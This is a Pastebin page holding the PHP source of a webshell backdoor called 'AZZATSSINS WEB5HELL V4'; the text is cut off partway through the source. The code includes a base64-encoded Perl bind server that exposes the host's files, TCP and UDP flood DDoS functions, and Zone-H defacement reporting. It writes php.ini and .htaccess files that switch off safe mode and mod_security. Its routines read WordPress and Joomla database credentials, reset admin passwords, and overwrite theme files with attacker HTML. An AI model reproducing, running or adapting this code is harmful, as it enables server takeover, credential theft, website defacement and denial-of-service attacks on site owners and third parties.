CYBERSERKERS

AZZATSSINS WEB5HELL V4

Jan 22nd, 2016
285
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 183.60 KB | None | 0 0
  1. <?php
  2.  
  3. /********************************
  4. Simple WebShell Backdoor EDITED BY AZZATSSIN'S CYBERSERS (CYBERSERKERS@GMAIL.COM)
  5. ********************************/
  6. $symlink = stripslashes(base64_decode("IyEvdXNyL2Jpbi9lbnYgcGVybA0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KDQp1c2UgU29ja2V0Ow0KDQokcG9ydCA9IDEzMTIzOw0KDQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoXCd0Y3BcJyk7DQpzb2NrZXQoUywmUEZfSU5FVCwmU09DS19TVFJFQU0sJHByb3RvY29sKSB8fCBkaWU7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kIChTLHNvY2thZGRyX2luKCRwb3J0LElOQUREUl9BTlkpKSB8fCBkaWU7DQpsaXN0ZW4gKFMsMykgfHwgZGllOw0Kd2hpbGUoMSl7DQoJYWNjZXB0IChDT05OLFMpOw0KCSRyZXE9PENPTk4+OyBjaG9tcCgkcmVxKTsgJHJlcT1+cy9cXHIvL2c7DQoJJHJlcSA9fiBzL1xcJShbQS1GYS1mMC05XXsyfSkvcGFjayhcJ0NcJywgaGV4KCQxKSkvc2VnOw0KCQ0KCXByaW50ICRyZXEuXCJcXHJcXG5cIjsNCgkNCgkkaGVhZGVycyA9IFwiSFRUUC8xLjEgMjAwIE9LXFxyXFxuXCI7DQoJJGhlYWRlcnMgLj0gXCJTZXJ2ZXI6IFBlcmxcXHJcXG5cIjsNCgkNCgkkdGFyZ2V0ID0gJHJlcTsNCglpZigkcmVxID1+IC9HRVQgLiogSFRUUC4qLyl7DQoJCSR0YXJnZXQgPX4gcy9HRVRcXCAvLzsNCgkJJHRhcmdldCA9fiBzL1xcIEhUVFAuKi8vOw0KCQkkcmVzcCA9IFwiXCI7DQoJCWlmKC1kICR0YXJnZXQpew0KCQkJaWYoISgkdGFyZ2V0ID1+IC8uKlxcLyskLykpew0KCQkJCSR0YXJnZXQgPSAkdGFyZ2V0LlwiL1wiOw0KCQkJfQ0KCQkJDQoJCQkkcmVzcCA9IFwiPCFET0NUWVBFIGh0bWwgUFVCTElDIFxcXCItLy9XM0MvL0RURCBIVE1MIDMuMiBGaW5hbC8vRU5cXFwiPg0KCQkJCQk8aHRtbD4NCgkJCQkJPHRpdGxlPkRpcmVjdG9yeSBsaXN0aW5nIGZvciBcIi4kdGFyZ2V0LlwiPC90aXRsZT4NCgkJCQkJPGJvZHk+DQoJCQkJCTxoMj5EaXJlY3RvcnkgbGlzdGluZyBmb3IgXCIuJHRhcmdldC5cIjwvaDI+DQoJCQkJCTxocj48dWw+XCI7DQoJCQkJCQ0KCQkJaWYob3BlbmRpcihESVIsJHRhcmdldCkpew0KCQkJCXdoaWxlKCRmaWxlID0gcmVhZGRpcihESVIpKXsNCgkJCQkJaWYoLWQgJHRhcmdldC4kZmlsZSl7DQoJCQkJCQlpZigoJGZpbGUgZXEgXCIuXCIpIHx8ICgkZmlsZSBlcSBcIi4uXCIpKXsgbmV4dDsgfQ0KCQkJCQkJJHJlc3AgLj0gXCI8bGk+PGEgaHJlZj1cXFwiXCIuJHRhcmdldC4kZmlsZS5cIi9cXFwiPlwiLiRmaWxlLlwiLzwvYT48L2xpPlxcclxcblwiOw0KCQkJCQl9DQoJCQkJCWVsc2lmKC1mICR0YXJnZXQuJGZpbGUpew0KCQkJCQkJJHJlc3AgLj0gXCI8bGk+PGEgaHJlZj1cXFwiXCIuJHRhcmdldC4kZmlsZS5cIlxcXCI+XCIuJGZpbGUuXCI8L2E+PC9saT5cXHJcXG5cIjsNCgkJCQkJfQ0KCQkJCX0NCgkJCQljbG9zZWRpcihESVIpOw0KCQkJfQ0KDQoJCQkkcmVzcCAuPSBcIjwvdWw+PGhyPg0KCQkJCQk8L2JvZHk+DQoJCQkJCTwvaHRtbD5cIjsNCgkJCQkJDQoJCQkkY29ubGVuID0gbGVuZ3RoKCRyZXNwKTsNCgkJCSRjb250eXBlID0gXCJ0ZXh0L2h0bWxcIjsNCgkJCXByaW50IFwiRGlyIDogXCIuJHRhcmdldC5cIlxcclxcblwiOw0KCQl9DQoJCWVsc2lmKC1mICR0YXJnZXQpew0KCQkJJGNvbmxlbiA9IC1zICR0YXJnZXQ7DQoJCQkkY29udHlwZSA9IFwidGV4dC9wbGFpblwiOw0KCQkJcHJpbnQgXCJGaWxlIDogXCIuJHRhcmdldC5cIiAoXCIuJGNvbmxlbi5cIilcXHJcXG5cIjsNCgkJfQ0KDQoJCXByaW50IFwiY29udHlwZSA6IFwiLiRjb250eXBlLlwiXFxyXFxuXCI7DQoJCXByaW50IFwiY29ubGVuIDogXCIuJGNvbmxlbi5cIlxcclxcblwiOw0KCQkNCgkJJGhlYWRlcnMgLj0gXCJDb250ZW50LVR5cGU6IFwiLiRjb250eXBlLlwiXFxyXFxuXCI7DQoJCSRoZWFkZXJzIC49IFwiQ29udGVudC1MZW5ndGg6IFwiLiRjb25sZW4uXCJcXHJcXG5cIjsNCgkNCgkJcHJpbnQgQ09OTiAkaGVhZGVycy5cIlxcclxcblwiOw0KCQkNCgkJaWYoLWQgJHRhcmdldCl7DQoJCQlwcmludCBDT05OICRyZXNwOw0KCQl9DQoJCWVsc2lmKC1mICR0YXJnZXQpew0KCQkJaWYob3BlbihGSUxFLCR0YXJnZXQpKXsNCgkJCQliaW5tb2RlIEZJTEU7DQoJCQkJd2hpbGUgKCgkbiA9IHJlYWQgRklMRSwgJGRhdGEsIDEwMjQpICE9IDApIHsgDQoJCQkJCXByaW50IENPTk4gJGRhdGE7DQoJCQkJfSANCgkJCQljbG9zZShGSUxFKTsgDQoJCQl9DQoJCX0NCgl9DQoJY2xvc2UgQ09OTjsNCn0NCmV4aXQgMDs="));
  7.  
  8.  
  9. function Zip($source, $destination) // Thanks to Alix Axel
  10. {
  11.     if (!extension_loaded('zip') || !file_exists($source)) {
  12.         return false;
  13.     }
  14.  
  15.     $zip = new ZipArchive();
  16.     if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
  17.         return false;
  18.     }
  19.  
  20.     $source = str_replace('\\', '/', realpath($source));
  21.  
  22.     if (is_dir($source) === true)
  23.     {
  24.         $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  25.  
  26.         foreach ($files as $file)
  27.         {
  28.             $file = str_replace('\\', '/', realpath($file));
  29.  
  30.             if (is_dir($file) === true)
  31.             {
  32.                 $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  33.             }
  34.             else if (is_file($file) === true)
  35.             {
  36.                 $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  37.             }
  38.         }
  39.     }
  40.     else if (is_file($source) === true)
  41.     {
  42.         $zip->addFromString(basename($source), file_get_contents($source));
  43.     }
  44.  
  45.     return $zip->close();
  46. }
  47.  
  48. function getperms ($file) {        
  49.     $perm = substr(sprintf('%o', fileperms($file)), -4);
  50.     return $perm;
  51. }
  52.  
  53. if(isset($_GET['zip'])) {
  54.     $src = $_GET['zip'];
  55.     $dst = getcwd()."/".basename($_GET['zip']).".zip";
  56.     if (Zip($src, $dst) != false) {
  57.         $filez = file_get_contents($dst);
  58.         header("Content-type: application/octet-stream");
  59.         header("Content-length: ".strlen($filez));
  60.         header("Content-disposition: attachment; filename=\"".basename($dst)."\";");
  61.         echo $filez;
  62.     }
  63.     exit;
  64. }
  65.  
  66. function showDrives()
  67.     {
  68.         global $self;
  69.         foreach(range('A','Z') as $drive)
  70.         {
  71.             if(is_dir($drive.':\\'))
  72.             {
  73.                 ?>
  74.                 &nbsp;&nbsp;&nbsp;&nbsp;<a style="font-family:vernada;color:pink" href='<?php echo $self ?>?go=<?php echo $drive.":\\"; ?>&action=files'>
  75.                     <?php echo $drive.":\\" ?>
  76.                 </a>
  77.                 <?php
  78.             }
  79.         }
  80.     }
  81.  
  82.  
  83. function HumanReadableFilesize($size)
  84.     {
  85.  
  86.         $mod = 1024;
  87.  
  88.         $units = explode(' ','B KB MB GB TB PB');
  89.         for ($i = 0; $size > $mod; $i++)
  90.         {
  91.             $size /= $mod;
  92.         }
  93.  
  94.         return round($size, 2) . ' ' . $units[$i];
  95.     }
  96. function getFilePermissions($file)
  97. {
  98.    
  99. $perms = fileperms($file);
  100.  
  101. if (($perms & 0xC000) == 0xC000) {
  102.     // Socket
  103.     $info = 's';
  104. } elseif (($perms & 0xA000) == 0xA000) {
  105.     // Symbolic Link
  106.     $info = 'l';
  107. } elseif (($perms & 0x8000) == 0x8000) {
  108.     // Regular
  109.     $info = '-';
  110. } elseif (($perms & 0x6000) == 0x6000) {
  111.     // Block special
  112.     $info = 'b';
  113. } elseif (($perms & 0x4000) == 0x4000) {
  114.     // Directory
  115.     $info = 'd';
  116. } elseif (($perms & 0x2000) == 0x2000) {
  117.     // Character special
  118.     $info = 'c';
  119. } elseif (($perms & 0x1000) == 0x1000) {
  120.     // FIFO pipe
  121.     $info = 'p';
  122. } else {
  123.     // Unknown
  124.     $info = 'u';
  125. }
  126.  
  127. // Owner
  128. $info .= (($perms & 0x0100) ? 'r' : '-');
  129. $info .= (($perms & 0x0080) ? 'w' : '-');
  130. $info .= (($perms & 0x0040) ?
  131.             (($perms & 0x0800) ? 's' : 'x' ) :
  132.             (($perms & 0x0800) ? 'S' : '-'));
  133.  
  134. // Group
  135. $info .= (($perms & 0x0020) ? 'r' : '-');
  136. $info .= (($perms & 0x0010) ? 'w' : '-');
  137. $info .= (($perms & 0x0008) ?
  138.             (($perms & 0x0400) ? 's' : 'x' ) :
  139.             (($perms & 0x0400) ? 'S' : '-'));
  140.  
  141. // World
  142. $info .= (($perms & 0x0004) ? 'r' : '-');
  143. $info .= (($perms & 0x0002) ? 'w' : '-');
  144. $info .= (($perms & 0x0001) ?
  145.             (($perms & 0x0200) ? 't' : 'x' ) :
  146.             (($perms & 0x0200) ? 'T' : '-'));
  147.  
  148. return $info;
  149.  
  150. }
  151. function dirSize($directory) {
  152.     $size = 0;
  153.     foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory)) as $file){
  154.         try {      
  155.             $size += $file->getSize();
  156.         }
  157.         catch (Exception $e){    // Symlinks and other shits
  158.             $size += 0;
  159.         }
  160.     }
  161.     return $size;
  162. }
  163.  
  164. // ddos ./Syrian_Shell
  165. function DDOSTcp($url)
  166. {
  167.     while(1)
  168.     {
  169.         $ch = curl_init($url);
  170.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  171.         $do = curl_exec($ch);
  172.         curl_close($ch);
  173.         flush();
  174.     }
  175. return true;
  176. }
  177. function DDOSUdp($url)
  178. {
  179.     $packets = 0;
  180.     ignore_user_abort(TRUE);
  181.     set_time_limit(0);
  182.     for($i=0;$i<65000;$i++){$out .= 'X'; }
  183.     while(1)
  184.     {
  185.             $packets++;
  186.             $rand = rand(1,65000);
  187.             $fp = fsockopen('udp://'.$url, $rand, $errno, $errstr, 5);
  188.             if($fp){fwrite($fp, $out); fclose($fp);}
  189.     } echo "UDP Flood : Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging\n";
  190. }
  191. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  192. {
  193.     $k = curl_init();
  194.     curl_setopt($k, CURLOPT_URL, $url);
  195.     curl_setopt($k,CURLOPT_POST,true);
  196.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  197.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  198.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  199.     $kubra = curl_exec($k);
  200.     curl_close($k);return $kubra;
  201. }
  202. @ini_set('error_log',NULL);
  203.  
  204. @ini_set('log_errors',0);
  205.  
  206. @ini_set('max_execution_time',0);
  207.  
  208. @set_time_limit(0);
  209.  
  210. @set_magic_quotes_runtime(0);
  211.  
  212. $enable_wp = true;
  213.  
  214. $enable_joomla = true;
  215.  
  216. $enable_vb = false;
  217.  
  218. $enable_phpbb = false;
  219.  
  220. $enable_ipb = false;
  221.  
  222. if(isset($_SESSION['safechk'])){
  223.  
  224. if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
  225.  
  226. $byphp = "safe_mode = Off
  227.  
  228. disable_functions =
  229.  
  230. safe_mode_gid = OFF
  231.  
  232. open_basedir = OFF
  233.  
  234. allow_url_fopen = On";
  235.  
  236. $byht = "<IfModule mod_security.c>
  237.  
  238. SecFilterEngine Off
  239.  
  240. SecFilterScanPOST Off
  241.  
  242. SecFilterCheckURLEncoding Off
  243.  
  244. SecFilterCheckUnicodeEncoding Off
  245.  
  246. </IfModule>";
  247.  
  248. file_put_contents("php.ini",$byphp);
  249.  
  250. file_put_contents(".htaccess",$byht);
  251.  
  252. $_SESSION['safechk'] = "done";
  253.  
  254. die("PHP Safe Mode ByPassed. Please Refresh This page");
  255.  
  256. }
  257.  
  258. }
  259.  
  260. function convertByte($s) {
  261.  
  262. if($s >= 1073741824)
  263.  
  264. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  265.  
  266. elseif($s >= 1048576)
  267.  
  268. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  269.  
  270. elseif($s >= 1024)
  271.  
  272. return sprintf('%1.2f',$s / 1024 ) .' KB';
  273.  
  274. else
  275.  
  276. return $s .' B';
  277.  
  278. }
  279.  
  280. function curPageURL() {
  281.  
  282. $pageURL = 'http';
  283.  
  284. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
  285.  
  286. $pageURL .= "://";
  287.  
  288. if ($_SERVER["SERVER_PORT"] != "80") {
  289.  
  290. $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  291.  
  292. }else {
  293.  
  294. $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  295.  
  296. }
  297.  
  298. return $pageURL;
  299.  
  300. }
  301.  
  302. function chkDis($link,$str){
  303.  
  304. $lol = get_headers($link,1);
  305.  
  306. if(strpos($lol[0],"200")){
  307.  
  308. $nan = file_get_contents($link);
  309.  
  310. if(strpos($nan,$str)){
  311.  
  312. return true;
  313.  
  314. }else{return false;}
  315.  
  316. }else{return false;}
  317.  
  318. }
  319.  
  320. function getDnamed(){
  321.  
  322. if(is_readable("/var/named")){
  323.  
  324. $list = scandir("/var/named");
  325.  
  326. foreach($list as $domain){
  327.  
  328. if(strpos($domain,".db")){
  329.  
  330. $i += 1;
  331.  
  332. $domain = str_replace('.db','',$domain);
  333.  
  334. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  335.  
  336. $dn[$owner['name']] = $domain;
  337.  
  338. }
  339.  
  340. }
  341.  
  342. }
  343.  
  344. return $dn;
  345.  
  346. }
  347.  
  348. function chkSys($link){
  349.  
  350. $sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
  351.  
  352. "Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
  353.  
  354. );
  355.  
  356. foreach($sys_arr as $k=>$dan){
  357.  
  358. if(chkDis($link.$dan['l'],$dan['s'])){
  359.  
  360. return array('link'=>$link.$dan['l'],'cms'=>$k);
  361.  
  362. }
  363.  
  364. }
  365.  
  366. }
  367.  
  368. function EloFind($str,$start,$end){
  369.  
  370. $len = strlen($str);
  371.  
  372. $start_pos = (strpos($str,$start) +strlen($start));
  373.  
  374. $str = substr($str,$start_pos);
  375.  
  376. $end_pos = strpos($str,$end);
  377.  
  378. $str = substr($str,0,$end_pos);
  379.  
  380. return $str;
  381.  
  382. }
  383.  
  384. function GetPage($url,$cookie,$post = null,$head = true) {
  385.  
  386. $ch = curl_init();
  387.  
  388. curl_setopt($ch,CURLOPT_URL,$url);
  389.  
  390. curl_setopt($ch,CURLOPT_HEADER,$head);
  391.  
  392. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  393.  
  394. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  395.  
  396. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
  397.  
  398. curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
  399.  
  400. curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
  401.  
  402. curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
  403.  
  404. curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
  405.  
  406. If ($post != NULL){
  407.  
  408. curl_setopt($ch,CURLOPT_POST,1);
  409.  
  410. curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
  411.  
  412. }
  413.  
  414. $urlPage = curl_exec($ch);
  415.  
  416. if(curl_errno($ch)){
  417.  
  418. echo curl_error($ch);
  419.  
  420. }
  421.  
  422. curl_close($ch);
  423.  
  424. return($urlPage);
  425.  
  426. }
  427.  
  428. function throwErr($str){
  429.  
  430. $arr = array("status"=>"error","msg"=>$str);
  431.  
  432. die(json_encode($arr));
  433.  
  434. }
  435.  
  436. function add2file($file,$str){
  437.  
  438. if(file_exists($file)){
  439.  
  440. $do = file_get_contents($file);
  441.  
  442. if(!strpos($do,$str)){
  443.  
  444. file_put_contents($file,$str,FILE_APPEND);
  445.  
  446. }
  447.  
  448. }else{
  449.  
  450. file_put_contents($file,$str,FILE_APPEND);
  451.  
  452. }
  453.  
  454. }
  455.  
  456. function doXploitWP($cnf,$html,$npass){
  457.  
  458. $success = false;
  459.  
  460. $str = file_get_contents($cnf);
  461.  
  462. if(preg_match('%DB_USER%',$str)){
  463.  
  464. $username=EloFind($str,"define('DB_USER', '","');");
  465.  
  466. $password=EloFind($str,"define('DB_PASSWORD', '","');");
  467.  
  468. $dbname=EloFind($str,"define('DB_NAME', '","');");
  469.  
  470. $prefix=EloFind($str,"table_prefix  = '","'");
  471.  
  472. $link=mysql_connect("localhost",$username,$password) ;
  473.  
  474. if ($link) {
  475.  
  476. mysql_select_db($dbname,$link) ;
  477.  
  478. $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
  479.  
  480. $req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  481.  
  482. $data = mysql_fetch_array($req);
  483.  
  484. $site_url=$data["option_value"];
  485.  
  486. }else{
  487.  
  488. throwErr("Mysql Fail");
  489.  
  490. }
  491.  
  492. $status['site'] = $site_url;
  493.  
  494. $cookie = 'cookie/'.md5($cnf).'.txt';
  495.  
  496. @unlink($cookie);
  497.  
  498. $logged_in = true;
  499.  
  500. $url = $site_url."/wp-login.php";
  501.  
  502. $postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
  503.  
  504. $logme = GetPage($url,$cookie,$postme);
  505.  
  506. if(!preg_match('%logout%',$logme)){
  507.  
  508. file_put_contents("login.txt",$site_url.$logme);
  509.  
  510. throwErr("Login Error");
  511.  
  512. }
  513.  
  514. if($logged_in){
  515.  
  516. $url = $site_url."/wp-admin/theme-editor.php";
  517.  
  518. $themeditor = GetPage($url,$cookie,null);
  519.  
  520. $nola = explode(Chr(10),$themeditor);
  521.  
  522. foreach($nola as $nline){
  523.  
  524. if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
  525.  
  526. $modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
  527.  
  528. }
  529.  
  530. }
  531.  
  532. if(is_array($modify)){
  533.  
  534. foreach($modify as $met=>$indfile){
  535.  
  536. $nri = str_replace('.','_',$met);
  537.  
  538. $nri = "n".$nri;
  539.  
  540. if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
  541.  
  542. $indfile =str_replace("&amp;","&",$indfile);
  543.  
  544. $url = trim($site_url."/wp-admin/".$indfile);
  545.  
  546. $themepage = GetPage($url,$cookie,"");
  547.  
  548. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  549.  
  550. $_file = EloFind($themepage,'name="file" value="','"');
  551.  
  552. $nfile = explode('themes',$_file);
  553.  
  554. $jfile = $site_url."/wp-content/themes".end($nfile);
  555.  
  556. $url = $site_url."/wp-admin/theme-editor.php";
  557.  
  558. $postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
  559.  
  560. $themedied = GetPage($url,$cookie,$postme);
  561.  
  562. if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
  563.  
  564. if(!$success){
  565.  
  566. add2file("wp_site.txt",$jfile.Chr(10));
  567.  
  568. }
  569.  
  570. $success = true;
  571.  
  572. if($met == "index.php"){
  573.  
  574. add2file("wp_index.txt",$site_url.Chr(10));
  575.  
  576. }
  577.  
  578. }else{
  579.  
  580. $error = true;
  581.  
  582. }
  583.  
  584. }
  585.  
  586. }
  587.  
  588. }else{
  589.  
  590. throwErr("No file found");
  591.  
  592. }
  593.  
  594. if($success){
  595.  
  596. $url = trim($site_url."/wp-admin/profile.php");
  597.  
  598. $themepage = GetPage($url,$cookie,"");
  599.  
  600. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  601.  
  602. $url = trim($site_url."/wp-admin/profile.php");
  603.  
  604. $postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&email=cyberserkers@gmail.com&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
  605.  
  606. $themepage = GetPage($url,$cookie,$postme);
  607.  
  608. $status['status'] = "success";
  609.  
  610. die(json_encode($status));
  611.  
  612. }
  613.  
  614. else{
  615.  
  616. if($error){
  617.  
  618. throwErr("Could't Update the file");
  619.  
  620. }else{
  621.  
  622. throwErr("Selected file not found");
  623.  
  624. }
  625.  
  626. }
  627.  
  628. }
  629.  
  630. }else{
  631.  
  632. throwErr("Config not found");
  633.  
  634. }
  635.  
  636. return true;
  637.  
  638. }
  639.  
  640. function doXploitJM($cnf,$html,$npass){
  641.  
  642. function joomlaCom($site_url,$cookie,$site){
  643.  
  644. if($_POST['com_install'] == "on"){
  645.  
  646. $url = $site_url ."/index.php?option=com_installer";
  647.  
  648. $compage = GetPage($url,$cookie);
  649.  
  650. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
  651.  
  652. $hash = $dhash[1];
  653.  
  654. preg_match_all('#value="/(.*?)"#s',$compage,$path);
  655.  
  656. foreach($path[0] as $pathx){
  657.  
  658. $pathx=ereg_replace('value="','',$pathx);
  659.  
  660. $pathx=ereg_replace('"','',$pathx);
  661.  
  662. }
  663.  
  664. $dir = getcwd()."/azzatssins.html";
  665.  
  666. $postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
  667.  
  668. $url = $site_url ."/index.php?option=com_installer";
  669.  
  670. $com_shell = GetPage($url,$cookie,$postme);
  671.  
  672. if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
  673.  
  674. add2file("jm_site.txt",$site."/tmp/azzatssins.html".Chr(10));
  675.  
  676. $status['site'] = $site."/tmp/azzatssins.html";
  677.  
  678. $status['status'] = "success";
  679.  
  680. die(json_encode($status));
  681.  
  682. }else{
  683.  
  684. return false;
  685.  
  686. }
  687.  
  688. }
  689.  
  690. return true;
  691.  
  692. }
  693.  
  694. $str = file_get_contents($cnf);
  695.  
  696. if(preg_match('%(JConfig|mosConfig)%',$str)){
  697.  
  698. if(preg_match('%JConfig%',$str)){
  699.  
  700. $username=EloFind($str,"\$user = '","'");
  701.  
  702. $password=EloFind($str,"\$password = '","'");
  703.  
  704. $dbname=EloFind($str,"\$db = '","'");
  705.  
  706. $prefix=EloFind($str,"\$dbprefix = '","'");
  707.  
  708. $pwd = md5($npass);
  709.  
  710. if($_POST['domain'] != "..."){
  711.  
  712. $site_url = $_POST['domain'];
  713.  
  714. $site_url = "http://".$site_url;
  715.  
  716. }else{
  717.  
  718. $mailto = EloFind($str,"\$mailfrom = '","'");
  719.  
  720. $siteul = explode('@',$mailto);
  721.  
  722. $site_url = "http://".$siteul[1];
  723.  
  724. }
  725.  
  726. }elseif(preg_match('%mosConfig%',$str)){
  727.  
  728. $username=EloFind($str,"\$mosConfig_user = '","'");
  729.  
  730. $password=EloFind($str,"\$mosConfig_password = '","'");
  731.  
  732. $dbname=EloFind($str,"\$mosConfig_db = '","'");
  733.  
  734. $prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
  735.  
  736. $pwd = md5($npass);
  737.  
  738. if($_POST['domain'] != "..."){
  739.  
  740. $site_url = $_POST['domain'];
  741.  
  742. $site_url = "http://".$site_url;
  743.  
  744. }else{
  745.  
  746. $mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
  747.  
  748. $siteul = explode('@',$mailto);
  749.  
  750. $site_url = "http://".$siteul[1];
  751.  
  752. }
  753.  
  754. }
  755.  
  756. $site = $site_url;
  757.  
  758. $site_url = $site_url."/administrator/";
  759.  
  760. $cookie = 'cookie/'.md5($cnf).'.txt';
  761.  
  762. @unlink($cookie);
  763.  
  764. $link=mysql_connect("localhost",$username,$password) ;
  765.  
  766. if ($link) {
  767.  
  768. mysql_select_db($dbname,$link);
  769.  
  770. $changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
  771.  
  772. $doit =mysql_query("SELECT * from  `".$prefix."extensions` ");
  773.  
  774. if($doit){
  775.  
  776. if($_POST['ignore_def'] == "on"){
  777.  
  778. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='0'");
  779.  
  780. $data = mysql_fetch_array($req);
  781.  
  782. $template_name=$data["template"];
  783.  
  784. if(strlen($template_name) <1){
  785.  
  786. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  787.  
  788. $data = mysql_fetch_array($req);
  789.  
  790. $template_name=$data["template"];
  791.  
  792. }
  793.  
  794. }
  795.  
  796. else{
  797.  
  798. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  799.  
  800. $data = mysql_fetch_array($req);
  801.  
  802. $template_name=$data["template"];
  803.  
  804. }
  805.  
  806. $req =mysql_query("SELECT * from  `".$prefix."extensions` WHERE name='".$template_name."'");
  807.  
  808. $data = mysql_fetch_array($req);
  809.  
  810. $template_id=$data["extension_id"];
  811.  
  812. $url = $site_url ."index.php";
  813.  
  814. $login_page = GetPage($url,$cookie);
  815.  
  816. $rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
  817.  
  818. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  819.  
  820. $hash = $dhash[1];
  821.  
  822. $url = $site_url ."index.php";
  823.  
  824. $postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
  825.  
  826. $logginin = GetPage($url,$cookie,$postme);
  827.  
  828. if(preg_match('%logout|index2\.php%',$logginin)){
  829.  
  830. $logged_in = true;
  831.  
  832. }
  833.  
  834. if(!$logged_in){
  835.  
  836. file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
  837.  
  838. throwErr("Login Error");
  839.  
  840. }
  841.  
  842. if($logged_in){
  843.  
  844. joomlaCom($site_url,$cookie,$site);
  845.  
  846. $url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  847.  
  848. $themepage = GetPage($url,$cookie);
  849.  
  850. if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
  851.  
  852. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  853.  
  854. $hash = $dhash[1];
  855.  
  856. $url = $site_url."/index.php?option=com_templates&layout=edit";
  857.  
  858. $postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
  859.  
  860. $themeedit = GetPage($url,$cookie,$postme);
  861.  
  862. if(preg_match('%class=\"message message\"%',$themeedit)){
  863.  
  864. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  865.  
  866. add2file("jm_index.txt",$site.Chr(10));
  867.  
  868. if($_POST['ignore_def'] == "on"){
  869.  
  870. $status['site'] = $site."/templates/".$template_name."/index.php";
  871.  
  872. }else{
  873.  
  874. $status['site'] = $site;
  875.  
  876. }
  877.  
  878. $status['status'] = "success";
  879.  
  880. die(json_encode($status));
  881.  
  882. }
  883.  
  884. else{
  885.  
  886. throwErr("Update failed");
  887.  
  888. }
  889.  
  890. }
  891.  
  892. else{
  893.  
  894. throwErr("Index not found");
  895.  
  896. }
  897.  
  898. }
  899.  
  900. }else{
  901.  
  902. $req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
  903.  
  904. $data = mysql_fetch_array($req);
  905.  
  906. $template_name=$data["template"];
  907.  
  908. $url = $site_url ."index.php";
  909.  
  910. $login_page = GetPage($url,$cookie);
